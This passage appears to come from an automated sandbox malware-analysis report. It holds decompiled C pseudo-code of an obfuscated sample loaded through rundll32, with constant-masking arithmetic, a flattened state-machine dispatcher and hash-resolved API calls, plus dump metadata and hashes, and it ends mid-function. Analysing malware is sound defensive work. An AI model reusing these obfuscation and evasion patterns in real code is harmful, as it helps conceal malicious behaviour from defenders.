                                                                                                                          				_v20 = _v20 >> 1;
                                                                                                                          				_v20 = _v20 ^ 0x003a157d;
                                                                                                                          				_v64 = 0x229c82;
                                                                                                                          				_v64 = _v64 >> 6;
                                                                                                                          				_v64 = _v64 + 0x6845;
                                                                                                                          				_v64 = _v64 ^ 0x000e1a2d;
                                                                                                                          				_v80 = 0xaa3c23;
                                                                                                                          				_v80 = _v80 + 0x9f20;
                                                                                                                          				_v80 = _v80 + 0x8b23;
                                                                                                                          				_v80 = _v80 | 0x21cd8be9;
                                                                                                                          				_v80 = _v80 ^ 0x21ed2977;
                                                                                                                          				_v84 = 0xa275e1;
                                                                                                                          				_v84 = _v84 >> 0xd;
                                                                                                                          				_t248 = 0;
                                                                                                                          				_t236 = 0x36;
                                                                                                                          				_v84 = _v84 / _t236;
                                                                                                                          				_v84 = _v84 | 0x6f301759;
                                                                                                                          				_t249 = 0xe982267;
                                                                                                                          				_v84 = _v84 ^ 0x6f339045;
                                                                                                                          				_v88 = 0x6e61be;
                                                                                                                          				_v88 = _v88 ^ 0xaf54e0d1;
                                                                                                                          				_v88 = _v88 >> 4;
                                                                                                                          				_v88 = _v88 | 0xfa70c1e6;
                                                                                                                          				_v88 = _v88 ^ 0xfaf0db59;
                                                                                                                          				_v8 = 0x2c245a;
                                                                                                                          				_v8 = _v8 << 8;
                                                                                                                          				_v8 = _v8 ^ 0x2c2bf9b3;
                                                                                                                          				_v36 = 0xcb696d;
                                                                                                                          				_v36 = _v36 >> 4;
                                                                                                                          				_v36 = _v36 << 5;
                                                                                                                          				_v36 = _v36 ^ 0x019dc7aa;
                                                                                                                          				_v76 = 0xb5019c;
                                                                                                                          				_v76 = _v76 + 0xffffd3ce;
                                                                                                                          				_t237 = 0x3a;
                                                                                                                          				_v76 = _v76 / _t237;
                                                                                                                          				_v76 = _v76 + 0xe675;
                                                                                                                          				_v76 = _v76 ^ 0x000db5c6;
                                                                                                                          				_v40 = 0x1e681a;
                                                                                                                          				_t238 = 0x22;
                                                                                                                          				_v40 = _v40 / _t238;
                                                                                                                          				_v40 = _v40 + 0x9449;
                                                                                                                          				_v40 = _v40 ^ 0x00094c29;
                                                                                                                          				_v12 = 0x15a3d6;
                                                                                                                          				_v12 = _v12 * 0x6f;
                                                                                                                          				_v12 = _v12 ^ 0x096cbb26;
                                                                                                                          				_v44 = 0x420567;
                                                                                                                          				_v44 = _v44 * 0x2b;
                                                                                                                          				_v44 = _v44 >> 8;
                                                                                                                          				_v44 = _v44 ^ 0x0004b329;
                                                                                                                          				_v24 = 0xd75fdc;
                                                                                                                          				_v24 = _v24 + 0x1e6b;
                                                                                                                          				_v24 = _v24 ^ 0x00df7832;
                                                                                                                          				_v92 = 0x2978f4;
                                                                                                                          				_v92 = _v92 ^ 0x1aa3462f;
                                                                                                                          				_v92 = _v92 * 0x3a;
                                                                                                                          				_v92 = _v92 | 0xa828e589;
                                                                                                                          				_v92 = _v92 ^ 0xab738ef3;
                                                                                                                          				_v28 = 0xea47cd;
                                                                                                                          				_v28 = _v28 * 0x68;
                                                                                                                          				_v28 = _v28 ^ 0x5f2069e4;
                                                                                                                          				_v16 = 0x52c32f;
                                                                                                                          				_v16 = _v16 | 0xda6d254c;
                                                                                                                          				_v16 = _v16 ^ 0xda7308ab;
                                                                                                                          				_v48 = 0xc39de2;
                                                                                                                          				_v48 = _v48 ^ 0x402eeacb;
                                                                                                                          				_v48 = _v48 + 0xb85a;
                                                                                                                          				_v48 = _v48 ^ 0x40eaab85;
                                                                                                                          				_v52 = 0xbb994d;
                                                                                                                          				_v52 = _v52 | 0x0bb22e40;
                                                                                                                          				_v52 = _v52 ^ 0x7c36a9dd;
                                                                                                                          				_v52 = _v52 ^ 0x7782b78d;
                                                                                                                          				_v68 = 0x6ee7f1;
                                                                                                                          				_v68 = _v68 * 3;
                                                                                                                          				_v68 = _v68 * 0x65;
                                                                                                                          				_v68 = _v68 + 0xffffc283;
                                                                                                                          				_v68 = _v68 ^ 0x834839c0;
                                                                                                                          				_v4 = 0x2c076e;
                                                                                                                          				_v4 = _v4 >> 2;
                                                                                                                          				_v4 = _v4 ^ 0x00027705;
                                                                                                                          				_v32 = 0x2be47d;
                                                                                                                          				_v32 = _v32 >> 3;
                                                                                                                          				_v32 = _v32 << 0x10;
                                                                                                                          				_v32 = _v32 ^ 0x7c8953c8;
                                                                                                                          				_v72 = 0x664751;
                                                                                                                          				_v72 = _v72 + 0xffffb67a;
                                                                                                                          				_v72 = _v72 + 0xf05a;
                                                                                                                          				_v72 = _v72 + 0xffff370a;
                                                                                                                          				_v72 = _v72 ^ 0x0066b29b;
                                                                                                                          				goto L1;
                                                                                                                          				do {
                                                                                                                          					while(1) {
                                                                                                                          						L1:
                                                                                                                          						_t254 = _t249 - 0xe145aac;
                                                                                                                          						if(_t254 > 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						if(_t254 == 0) {
                                                                                                                          							_push(_t238);
                                                                                                                          							_push(_t238);
                                                                                                                          							_t220 = E0079474B();
                                                                                                                          							_t251 =  &(_t251[2]);
                                                                                                                          							_t249 = 0x70e2d06;
                                                                                                                          							_t248 = _t248 + _t220;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t249 == 0x15047ce) {
                                                                                                                          								_push(_t238);
                                                                                                                          								_push(_t238);
                                                                                                                          								_t224 = E0079474B();
                                                                                                                          								_t251 =  &(_t251[2]);
                                                                                                                          								_t249 = 0xe32aaf2;
                                                                                                                          								_t248 = _t248 + _t224;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t249 == 0x4d33fe3) {
                                                                                                                          									_push(_t238);
                                                                                                                          									_push(_t238);
                                                                                                                          									_t228 = E0079474B();
                                                                                                                          									_t251 =  &(_t251[2]);
                                                                                                                          									_t249 = 0xe45b300;
                                                                                                                          									_t248 = _t248 + _t228;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									if(_t249 == 0x708a22e) {
                                                                                                                          										_t238 = _v56;
                                                                                                                          										_t229 = E007AC2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
                                                                                                                          										_t251 =  &(_t251[3]);
                                                                                                                          										_t249 = 0x15047ce;
                                                                                                                          										_t248 = _t248 + _t229;
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										if(_t249 != 0x70e2d06) {
                                                                                                                          											goto L17;
                                                                                                                          										} else {
                                                                                                                          											_push(_t238);
                                                                                                                          											_push(_t238);
                                                                                                                          											_t233 = E0079474B();
                                                                                                                          											_t251 =  &(_t251[2]);
                                                                                                                          											_t249 = 0x4d33fe3;
                                                                                                                          											_t248 = _t248 + _t233;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L20:
                                                                                                                          						return _t248;
                                                                                                                          					}
                                                                                                                          					if(_t249 == 0xe32aaf2) {
                                                                                                                          						_push(_t238);
                                                                                                                          						_push(_t238);
                                                                                                                          						_t214 = E0079474B();
                                                                                                                          						_t251 =  &(_t251[2]);
                                                                                                                          						_t249 = 0xe145aac;
                                                                                                                          						_t248 = _t248 + _t214;
                                                                                                                          						goto L17;
                                                                                                                          					} else {
                                                                                                                          						if(_t249 == 0xe45b300) {
                                                                                                                          							_t248 = _t248 + E007AC2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
                                                                                                                          						} else {
                                                                                                                          							if(_t249 != 0xe982267) {
                                                                                                                          								goto L17;
                                                                                                                          							} else {
                                                                                                                          								_t249 = 0x708a22e;
                                                                                                                          								goto L1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L20;
                                                                                                                          					L17:
                                                                                                                          				} while (_t249 != 0xce30a1f);
                                                                                                                          				goto L20;
                                                                                                                          			}








































                                                                                                                          0x007aca10
                                                                                                                          0x007aca0e
                                                                                                                          0x007aca06
                                                                                                                          0x00000000
                                                                                                                          0x007aca34
                                                                                                                          0x007aca34
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                          • API String ID: 0-1553751006
                                                                                                                          • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                          • Instruction ID: 47ceba52b75d9ec84ff00e7bb3904bb94719c269a3c0fe34d97b5d69ab756338
                                                                                                                          • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                          • Instruction Fuzzy Hash: 01A111B28083419FC399CF65D48A80BFBE1BBC5758F504A1DF595A6220D3B9DA49CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007AF435(intOrPtr* __ecx, signed int __edx) {
                                                                                                                          				char _v128;
                                                                                                                          				char _v256;
                                                                                                                          				char _v288;
                                                                                                                          				intOrPtr _v292;
                                                                                                                          				signed int _v296;
                                                                                                                          				signed int _v300;
                                                                                                                          				signed int _v304;
                                                                                                                          				signed int _v308;
                                                                                                                          				signed int _v312;
                                                                                                                          				signed int _v316;
                                                                                                                          				signed int _v320;
                                                                                                                          				signed int _v324;
                                                                                                                          				signed int _v328;
                                                                                                                          				signed int _v332;
                                                                                                                          				signed int _v336;
                                                                                                                          				signed int _v340;
                                                                                                                          				signed int _v344;
                                                                                                                          				signed int _v348;
                                                                                                                          				signed int _v352;
                                                                                                                          				signed int _v356;
                                                                                                                          				signed int _v360;
                                                                                                                          				signed int _v364;
                                                                                                                          				signed int _v368;
                                                                                                                          				signed int _v372;
                                                                                                                          				signed int _v376;
                                                                                                                          				signed int _v380;
                                                                                                                          				signed int _v384;
                                                                                                                          				signed int _v388;
                                                                                                                          				signed int _v392;
                                                                                                                          				signed int _v396;
                                                                                                                          				signed int _v400;
                                                                                                                          				signed int _v404;
                                                                                                                          				signed int _v408;
                                                                                                                          				signed int _v412;
                                                                                                                          				signed int _v416;
                                                                                                                          				signed int _v420;
                                                                                                                          				signed int _v424;
                                                                                                                          				signed int _v428;
                                                                                                                          				signed int _v432;
                                                                                                                          				signed int _v436;
                                                                                                                          				signed int _v440;
                                                                                                                          				signed int _v444;
                                                                                                                          				signed int _v448;
                                                                                                                          				signed int _v452;
                                                                                                                          				intOrPtr* _v456;
                                                                                                                          				signed int _v460;
                                                                                                                          				signed int _v464;
                                                                                                                          				signed int _v468;
                                                                                                                          				signed int _v472;
                                                                                                                          				signed int _v476;
                                                                                                                          				signed int _v480;
                                                                                                                          				signed int _v484;
                                                                                                                          				signed int _v488;
                                                                                                                          				signed int _v492;
                                                                                                                          				signed int _v496;
                                                                                                                          				signed int _v500;
                                                                                                                          				signed int _v504;
                                                                                                                          				signed int _v508;
                                                                                                                          				signed int _v512;
                                                                                                                          				signed int _v516;
                                                                                                                          				signed int _v520;
                                                                                                                          				void* _t551;
                                                                                                                          				void* _t554;
                                                                                                                          				signed int _t560;
                                                                                                                          				void* _t563;
                                                                                                                          				int _t566;
                                                                                                                          				void* _t580;
                                                                                                                          				signed int* _t582;
                                                                                                                          				void* _t587;
                                                                                                                          				signed int _t595;
                                                                                                                          				void* _t598;
                                                                                                                          				signed int _t601;
                                                                                                                          				signed int _t602;
                                                                                                                          				signed int _t603;
                                                                                                                          				intOrPtr* _t610;
                                                                                                                          				signed int _t634;
                                                                                                                          				void* _t659;
                                                                                                                          				signed int _t675;
                                                                                                                          				signed int _t676;
                                                                                                                          				signed int _t677;
                                                                                                                          				signed int _t678;
                                                                                                                          				signed int _t679;
                                                                                                                          				signed int _t680;
                                                                                                                          				void* _t682;
                                                                                                                          				void* _t683;
                                                                                                                          				void* _t686;
                                                                                                                          				void* _t687;
                                                                                                                          				signed int _t692;
                                                                                                                          				signed int _t693;
                                                                                                                          				signed int* _t694;
                                                                                                                          				void* _t698;
                                                                                                                          
                                                                                                                          				_t694 =  &_v520;
                                                                                                                          				_v296 = __edx;
                                                                                                                          				_v456 = __ecx;
                                                                                                                          				_v308 = 0x7c82e0;
                                                                                                                          				_v308 = _v308 ^ 0x9529f8b7;
                                                                                                                          				_v308 = _v308 ^ 0x95557a57;
                                                                                                                          				_v444 = 0xbd655a;
                                                                                                                          				_v444 = _v444 + 0x6586;
                                                                                                                          				_v444 = _v444 + 0xffff1486;
                                                                                                                          				_v444 = _v444 ^ 0x00b10b5d;
                                                                                                                          				_v360 = 0x6df28f;
                                                                                                                          				_v360 = _v360 >> 0xc;
                                                                                                                          				_v360 = _v360 ^ 0xc93a0f00;
                                                                                                                          				_v360 = _v360 ^ 0xc93b57a7;
                                                                                                                          				_v380 = 0x803da4;
                                                                                                                          				_v380 = _v380 + 0x81b0;
                                                                                                                          				_v380 = _v380 << 0x10;
                                                                                                                          				_v380 = _v380 ^ 0xbf59b73f;
                                                                                                                          				_v484 = 0xdeaf13;
                                                                                                                          				_v484 = _v484 | 0x05ba16e8;
                                                                                                                          				_v484 = _v484 + 0xffff5e7b;
                                                                                                                          				_v484 = _v484 + 0x21a5;
                                                                                                                          				_v484 = _v484 ^ 0x05f35408;
                                                                                                                          				_v516 = 0x9c12e3;
                                                                                                                          				_v516 = _v516 >> 5;
                                                                                                                          				_v516 = _v516 + 0x3879;
                                                                                                                          				_t686 = 0x618a3a9;
                                                                                                                          				_t676 = 0x46;
                                                                                                                          				_v516 = _v516 / _t676;
                                                                                                                          				_v516 = _v516 ^ 0x000beb5e;
                                                                                                                          				_v404 = 0x49e9fe;
                                                                                                                          				_v404 = _v404 + 0x1375;
                                                                                                                          				_v404 = _v404 | 0x014362a3;
                                                                                                                          				_v404 = _v404 ^ 0x01430578;
                                                                                                                          				_v408 = 0xd49d0c;
                                                                                                                          				_v408 = _v408 + 0x89ee;
                                                                                                                          				_v408 = _v408 | 0xbbfa4d8a;
                                                                                                                          				_v408 = _v408 ^ 0xbbf95772;
                                                                                                                          				_v504 = 0x33cefe;
                                                                                                                          				_v504 = _v504 >> 0xa;
                                                                                                                          				_v504 = _v504 >> 0xd;
                                                                                                                          				_v504 = _v504 + 0xffff4738;
                                                                                                                          				_v504 = _v504 ^ 0xfff61340;
                                                                                                                          				_v388 = 0x38423a;
                                                                                                                          				_t75 =  &_v388; // 0x38423a
                                                                                                                          				_t601 = 0x7b;
                                                                                                                          				_v388 =  *_t75 * 0x2c;
                                                                                                                          				_v388 = _v388 + 0x7a90;
                                                                                                                          				_v388 = _v388 ^ 0x09a92ca6;
                                                                                                                          				_v396 = 0x89c34a;
                                                                                                                          				_v396 = _v396 >> 6;
                                                                                                                          				_v396 = _v396 | 0xaa955d3e;
                                                                                                                          				_v396 = _v396 ^ 0xaa9cf099;
                                                                                                                          				_v316 = 0x54e1fb;
                                                                                                                          				_v316 = _v316 + 0xffff88b2;
                                                                                                                          				_v316 = _v316 ^ 0x0053b1cb;
                                                                                                                          				_v392 = 0xd67855;
                                                                                                                          				_v392 = _v392 + 0xd739;
                                                                                                                          				_v392 = _v392 * 0x34;
                                                                                                                          				_v392 = _v392 ^ 0x2bb8cf2c;
                                                                                                                          				_v512 = 0x9dc1ac;
                                                                                                                          				_v512 = _v512 | 0xff1b5e8c;
                                                                                                                          				_v512 = _v512 / _t601;
                                                                                                                          				_v512 = _v512 + 0xc237;
                                                                                                                          				_v512 = _v512 ^ 0x02115509;
                                                                                                                          				_v368 = 0xb0c27;
                                                                                                                          				_v368 = _v368 * 0x3a;
                                                                                                                          				_v368 = _v368 + 0x9417;
                                                                                                                          				_v368 = _v368 ^ 0x028ae81d;
                                                                                                                          				_v352 = 0x7ea940;
                                                                                                                          				_v352 = _v352 + 0xffff6a40;
                                                                                                                          				_v352 = _v352 | 0x1d7a7563;
                                                                                                                          				_v352 = _v352 ^ 0x1d74a207;
                                                                                                                          				_v340 = 0xd37cb9;
                                                                                                                          				_v340 = _v340 >> 5;
                                                                                                                          				_v340 = _v340 ^ 0x00021b7e;
                                                                                                                          				_v384 = 0xc54f7c;
                                                                                                                          				_v384 = _v384 | 0xe1c129a4;
                                                                                                                          				_v384 = _v384 << 6;
                                                                                                                          				_v384 = _v384 ^ 0x7152788e;
                                                                                                                          				_v320 = 0xafdf9b;
                                                                                                                          				_v320 = _v320 | 0x588bef45;
                                                                                                                          				_v320 = _v320 ^ 0x58ad1127;
                                                                                                                          				_v508 = 0x7882a6;
                                                                                                                          				_v508 = _v508 ^ 0x5ae648f7;
                                                                                                                          				_t677 = 0x7e;
                                                                                                                          				_v508 = _v508 / _t677;
                                                                                                                          				_v508 = _v508 + 0xffff266f;
                                                                                                                          				_v508 = _v508 ^ 0x00b4570c;
                                                                                                                          				_v344 = 0x25ec7c;
                                                                                                                          				_t158 =  &_v344; // 0x25ec7c
                                                                                                                          				_t692 = 0x77;
                                                                                                                          				_v344 =  *_t158 * 0x48;
                                                                                                                          				_v344 = _v344 ^ 0x0aab681c;
                                                                                                                          				_v332 = 0xac456;
                                                                                                                          				_v332 = _v332 ^ 0x143b2d92;
                                                                                                                          				_v332 = _v332 ^ 0x1438ce6d;
                                                                                                                          				_v436 = 0x1dd68;
                                                                                                                          				_v436 = _v436 + 0x1e14;
                                                                                                                          				_v436 = _v436 / _t692;
                                                                                                                          				_v436 = _v436 ^ 0x000407e3;
                                                                                                                          				_v468 = 0x975814;
                                                                                                                          				_v468 = _v468 | 0x165c3dad;
                                                                                                                          				_v468 = _v468 >> 3;
                                                                                                                          				_v468 = _v468 + 0x9a99;
                                                                                                                          				_v468 = _v468 ^ 0x02d4af38;
                                                                                                                          				_v428 = 0xd1fa32;
                                                                                                                          				_v428 = _v428 + 0x34cd;
                                                                                                                          				_v428 = _v428 >> 0xa;
                                                                                                                          				_v428 = _v428 ^ 0x000c7c43;
                                                                                                                          				_v372 = 0xb93604;
                                                                                                                          				_v372 = _v372 >> 0xb;
                                                                                                                          				_v372 = _v372 + 0x569f;
                                                                                                                          				_v372 = _v372 ^ 0x0001c97c;
                                                                                                                          				_v312 = 0xb8b780;
                                                                                                                          				_v312 = _v312 / _t601;
                                                                                                                          				_v312 = _v312 ^ 0x0009bb57;
                                                                                                                          				_v364 = 0xc6b8c5;
                                                                                                                          				_v364 = _v364 >> 4;
                                                                                                                          				_v364 = _v364 << 0xf;
                                                                                                                          				_v364 = _v364 ^ 0x35c8234d;
                                                                                                                          				_v500 = 0x5d2db3;
                                                                                                                          				_v500 = _v500 | 0xa4ec7bca;
                                                                                                                          				_v500 = _v500 * 0x42;
                                                                                                                          				_v500 = _v500 + 0xffff6871;
                                                                                                                          				_v500 = _v500 ^ 0x8955fb09;
                                                                                                                          				_v492 = 0xf8ac1c;
                                                                                                                          				_v492 = _v492 + 0xd489;
                                                                                                                          				_v492 = _v492 | 0x938b5662;
                                                                                                                          				_v492 = _v492 << 6;
                                                                                                                          				_v492 = _v492 ^ 0xfef6fac0;
                                                                                                                          				_v356 = 0x80a8a7;
                                                                                                                          				_v356 = _v356 >> 3;
                                                                                                                          				_v356 = _v356 + 0xffff1aa9;
                                                                                                                          				_v356 = _v356 ^ 0x00023cc5;
                                                                                                                          				_v420 = 0x29f504;
                                                                                                                          				_v420 = _v420 ^ 0x96d25191;
                                                                                                                          				_v420 = _v420 << 0xa;
                                                                                                                          				_v420 = _v420 ^ 0xee96722c;
                                                                                                                          				_v476 = 0x6526e6;
                                                                                                                          				_t250 =  &_v476; // 0x6526e6
                                                                                                                          				_t602 = 9;
                                                                                                                          				_t678 = 0x5e;
                                                                                                                          				_v476 =  *_t250 * 0x65;
                                                                                                                          				_t252 =  &_v476; // 0x6526e6
                                                                                                                          				_v476 =  *_t252 * 0x5d;
                                                                                                                          				_v476 = _v476 + 0xffffa50d;
                                                                                                                          				_v476 = _v476 ^ 0x7f6d4504;
                                                                                                                          				_v304 = 0x6f90;
                                                                                                                          				_v304 = _v304 + 0xffffb625;
                                                                                                                          				_v304 = _v304 ^ 0x0000ce69;
                                                                                                                          				_v348 = 0xd48165;
                                                                                                                          				_v348 = _v348 * 0x4f;
                                                                                                                          				_v348 = _v348 + 0xa298;
                                                                                                                          				_v348 = _v348 ^ 0x41980148;
                                                                                                                          				_v412 = 0x7e685b;
                                                                                                                          				_t271 =  &_v412; // 0x7e685b
                                                                                                                          				_v412 =  *_t271 * 0x1d;
                                                                                                                          				_v412 = _v412 >> 0xe;
                                                                                                                          				_v412 = _v412 ^ 0x000f1110;
                                                                                                                          				_v460 = 0xd80dae;
                                                                                                                          				_v460 = _v460 * 0x4a;
                                                                                                                          				_v460 = _v460 << 9;
                                                                                                                          				_v460 = _v460 >> 5;
                                                                                                                          				_v460 = _v460 ^ 0x073a202e;
                                                                                                                          				_v324 = 0x2acd4f;
                                                                                                                          				_v324 = _v324 ^ 0x1744d618;
                                                                                                                          				_v324 = _v324 ^ 0x1766082c;
                                                                                                                          				_v400 = 0xe6723b;
                                                                                                                          				_v400 = _v400 ^ 0x220d80d9;
                                                                                                                          				_v400 = _v400 ^ 0x0161a8c1;
                                                                                                                          				_v400 = _v400 ^ 0x238d1a3c;
                                                                                                                          				_v376 = 0xaaa6;
                                                                                                                          				_v376 = _v376 + 0xd31a;
                                                                                                                          				_v376 = _v376 + 0xfffff53b;
                                                                                                                          				_v376 = _v376 ^ 0x00079406;
                                                                                                                          				_v452 = 0xe6cc76;
                                                                                                                          				_v452 = _v452 ^ 0xa4c29e28;
                                                                                                                          				_v452 = _v452 / _t602;
                                                                                                                          				_v452 = _v452 ^ 0x123fe3c8;
                                                                                                                          				_v520 = 0x822cac;
                                                                                                                          				_v520 = _v520 / _t678;
                                                                                                                          				_v520 = _v520 << 4;
                                                                                                                          				_v520 = _v520 << 9;
                                                                                                                          				_v520 = _v520 ^ 0x2c5f9d39;
                                                                                                                          				_v440 = 0xafb195;
                                                                                                                          				_v440 = _v440 + 0xffff123a;
                                                                                                                          				_v440 = _v440 >> 0xa;
                                                                                                                          				_v440 = _v440 ^ 0x0003dc41;
                                                                                                                          				_v448 = 0xdf86e4;
                                                                                                                          				_v448 = _v448 ^ 0xac60bb5d;
                                                                                                                          				_v448 = _v448 ^ 0x5238faed;
                                                                                                                          				_v448 = _v448 ^ 0xfe8be764;
                                                                                                                          				_v336 = 0x3e14c9;
                                                                                                                          				_v336 = _v336 << 7;
                                                                                                                          				_v336 = _v336 ^ 0x1f0fc953;
                                                                                                                          				_v496 = 0x4885f3;
                                                                                                                          				_v496 = _v496 * 0x25;
                                                                                                                          				_v496 = _v496 + 0x3aa8;
                                                                                                                          				_v496 = _v496 + 0xffff73aa;
                                                                                                                          				_v496 = _v496 ^ 0x0a7b30ee;
                                                                                                                          				_v480 = 0xca6b34;
                                                                                                                          				_v480 = _v480 >> 9;
                                                                                                                          				_v480 = _v480 + 0xfb6a;
                                                                                                                          				_v480 = _v480 / _t692;
                                                                                                                          				_v480 = _v480 ^ 0x000164ed;
                                                                                                                          				_v432 = 0xb19133;
                                                                                                                          				_t679 = 0x63;
                                                                                                                          				_t693 = _v296;
                                                                                                                          				_v432 = _v432 * 0x53;
                                                                                                                          				_v432 = _v432 >> 0x10;
                                                                                                                          				_v432 = _v432 ^ 0x00018cb4;
                                                                                                                          				_v328 = 0xdb466c;
                                                                                                                          				_t603 = _v296;
                                                                                                                          				_v328 = _v328 / _t679;
                                                                                                                          				_v328 = _v328 ^ 0x000e2190;
                                                                                                                          				_v488 = 0xd48740;
                                                                                                                          				_t680 = 0x44;
                                                                                                                          				_v488 = _v488 * 7;
                                                                                                                          				_v488 = _v488 * 0x66;
                                                                                                                          				_v488 = _v488 + 0x34f;
                                                                                                                          				_v488 = _v488 ^ 0x50c19e73;
                                                                                                                          				_v424 = 0xacfab2;
                                                                                                                          				_v424 = _v424 / _t680;
                                                                                                                          				_v424 = _v424 | 0xedf008b5;
                                                                                                                          				_v424 = _v424 ^ 0xedf22909;
                                                                                                                          				_v472 = 0x2e74a8;
                                                                                                                          				_v472 = _v472 * 0x3f;
                                                                                                                          				_v472 = _v472 ^ 0x6424471f;
                                                                                                                          				_v472 = _v472 >> 0xb;
                                                                                                                          				_v472 = _v472 ^ 0x0009d0c0;
                                                                                                                          				_v416 = 0x7e19d4;
                                                                                                                          				_v416 = _v416 << 0xd;
                                                                                                                          				_v416 = _v416 + 0x1081;
                                                                                                                          				_v416 = _v416 ^ 0xc3344569;
                                                                                                                          				_v464 = 0xa74bb7;
                                                                                                                          				_v464 = _v464 >> 0xb;
                                                                                                                          				_v464 = _v464 + 0x9c4;
                                                                                                                          				_v464 = _v464 >> 6;
                                                                                                                          				_v464 = _v464 ^ 0x000976a8;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t551 = 0xf168e34;
                                                                                                                          					do {
                                                                                                                          						while(1) {
                                                                                                                          							L2:
                                                                                                                          							_t698 = _t686 - 0x7498ebf;
                                                                                                                          							if(_t698 > 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							if(_t698 == 0) {
                                                                                                                          								_push(_v496);
                                                                                                                          								_push(_v336);
                                                                                                                          								_push(_v448);
                                                                                                                          								_t580 = E00797F1D(_v480, _t603, _v432, E007A8606(_v440, 0x791560, __eflags), _v328, _v292 - _t603, _v488);
                                                                                                                          								E0079A8B0(_v424, _t577, _v472);
                                                                                                                          								_t582 = _v296;
                                                                                                                          								 *_t582 = _t693;
                                                                                                                          								_t582[1] = _t603 + _t580 - _t693;
                                                                                                                          								goto L29;
                                                                                                                          							}
                                                                                                                          							if(_t686 == 0x488924) {
                                                                                                                          								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                          								_push(_t610);
                                                                                                                          								_push(_t610);
                                                                                                                          								_t693 = E00797FF2(_t682);
                                                                                                                          								__eflags = _t693;
                                                                                                                          								_t551 = 0xf168e34;
                                                                                                                          								_t610 = _v456;
                                                                                                                          								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							if(_t686 == 0x123a276) {
                                                                                                                          								_push(_v468);
                                                                                                                          								_push(_v436);
                                                                                                                          								_t587 = E007ADCF7(_v332, 0x7915c0, __eflags);
                                                                                                                          								_push( &_v256);
                                                                                                                          								_push(_t587);
                                                                                                                          								_push(_t682);
                                                                                                                          								_push(_v300);
                                                                                                                          								 *((intOrPtr*)(E0079A42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                          								E0079A8B0(_v428, _t587, _v372);
                                                                                                                          								_t694 =  &(_t694[5]);
                                                                                                                          								_t686 = 0x488924;
                                                                                                                          								L12:
                                                                                                                          								_t610 = _v456;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t551 = 0xf168e34;
                                                                                                                          									goto L2;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(_t686 != 0x57ff6e7) {
                                                                                                                          								if(_t686 == 0x5f676f3) {
                                                                                                                          									_t598 = E007A0AE0(8, 1);
                                                                                                                          									_push(_v516);
                                                                                                                          									_t682 = _t598;
                                                                                                                          									_push( &_v288);
                                                                                                                          									_push(_t682);
                                                                                                                          									_push(9);
                                                                                                                          									E007980E3(_v380, _v484);
                                                                                                                          									_t686 = 0x7f96e60;
                                                                                                                          									L11:
                                                                                                                          									_t694 =  &(_t694[6]);
                                                                                                                          									goto L12;
                                                                                                                          								} else {
                                                                                                                          									if(_t686 != 0x618a3a9) {
                                                                                                                          										goto L28;
                                                                                                                          									} else {
                                                                                                                          										_t686 = 0x5f676f3;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L30:
                                                                                                                          								return _t595;
                                                                                                                          							}
                                                                                                                          							_t682 = 0x4000;
                                                                                                                          							_push(_t610);
                                                                                                                          							_push(_t610);
                                                                                                                          							_t595 = E00797FF2(0x4000);
                                                                                                                          							_v300 = _t595;
                                                                                                                          							__eflags = _t595;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								_t686 = 0x123a276;
                                                                                                                          								goto L12;
                                                                                                                          							}
                                                                                                                          							goto L30;
                                                                                                                          						}
                                                                                                                          						__eflags = _t686 - 0x7f96e60;
                                                                                                                          						if(_t686 == 0x7f96e60) {
                                                                                                                          							_t554 = E007A0AE0(0x10, 4);
                                                                                                                          							_push(_v396);
                                                                                                                          							_t682 = _t554;
                                                                                                                          							_push( &_v128);
                                                                                                                          							_push(_t682);
                                                                                                                          							_push(0xb);
                                                                                                                          							E007980E3(_v504, _v388);
                                                                                                                          							_t610 = _v456;
                                                                                                                          							_t694 =  &(_t694[6]);
                                                                                                                          							_t686 = 0x8d9b717;
                                                                                                                          							_t551 = 0xf168e34;
                                                                                                                          							goto L28;
                                                                                                                          						} else {
                                                                                                                          							__eflags = _t686 - 0x8d9b717;
                                                                                                                          							if(_t686 == 0x8d9b717) {
                                                                                                                          								_t687 =  &_v256;
                                                                                                                          								_t659 = E007A0AE0(0x10, 8);
                                                                                                                          								_t560 = _v308;
                                                                                                                          								__eflags = _t560 - _t659;
                                                                                                                          								if(_t560 < _t659) {
                                                                                                                          									_t675 = _t659 - _t560;
